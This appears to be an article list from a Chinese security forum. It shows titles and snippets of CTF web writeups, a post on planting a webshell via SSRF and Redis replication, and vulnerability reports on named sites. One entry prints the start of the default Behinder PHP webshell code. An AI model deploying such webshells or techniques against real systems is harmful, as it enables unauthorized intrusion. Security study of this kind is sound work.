文章列表
2020-网鼎杯(青龙组)_Web题目 AreUserialz Writeup
## 0x02 AreUSerialz **关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图****考点: php反序列化 php特性 利用链构造 ****1.打开页面得到代码如下:**```php<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $
2020-网鼎杯(青龙组)_Web题目 FileJava Writeup
## 0x01 Web题目: filejava **考点: 任意文件读取 代码审计 java组件漏洞利用 盲XXE****1.随意上传文件,试了试 jsp. 可以上传,返回下载地址,有filename参数,fuzz一下,发现有任意文件读取****2.试着fuzz读flag,没有结果,读了下web.xml,那就把源码down下来,审计一下****通过一个小工具,把源码down下:***
通过 SSRF 操作 Redis 主从复制写 Webshell
十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。自己转载自己公开的文章应该不会被 ban 吧?Author : R3start and 曲云杰2020年4月1日19:57:37废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET)){ $key=substr(md5(uniqid(rand())),16); $_SESSION=$key; print $key;}else{ $key=$_SESSION;$post=file_get_contents("php://input").'';if(!exten
腾讯(qq.com)某分站绑定手机验证绕过
腾讯(qq.com)某分站绑定手机验证绕过
万能五笔输入法(wnwb.com)主站SQL注入漏洞
万能五笔输入法(wnwb.com)主站SQL注入漏洞
百度(baidu.com)下载页面CRLF注入漏洞
百度(baidu.com)下载页面CRLF注入漏洞
存在于自 2014 年以来所有三星手机中的高危漏洞终于被修复
三星本周发布了一个安全更新,修复了自2014年以来一直存在于旗下所有智能手机中的关键漏洞。该漏洞最早可以追溯到2014年下半年,三星开始在所有发布的设备中引入了对自定义Qmage图像格式(.qmg)的支持,而三星的定制Android系统在处理该图像格式上存在漏洞。 谷歌Project Zero的安全研究员Mateusz Ju
关于对违规会员@abuuu 的处理
经热心会员举报,会员@abuuu 涉嫌发布带后门源码,如图有关帖子链接如下https://www.t00ls.com/thread-56267-1-1.htmlhttps://www.t00ls.com/thread-54640-1-1.html经管理组核实,该会员严重违反了论坛有关规定第一部分 T00ls基本守则二、版块规则1、仅有七个版块可以发表主题贴:新闻动态、技术交流、
快手(kuaishou.cn)某分站短信轰炸漏洞
快手(kuaishou.cn)某分站短信轰炸漏洞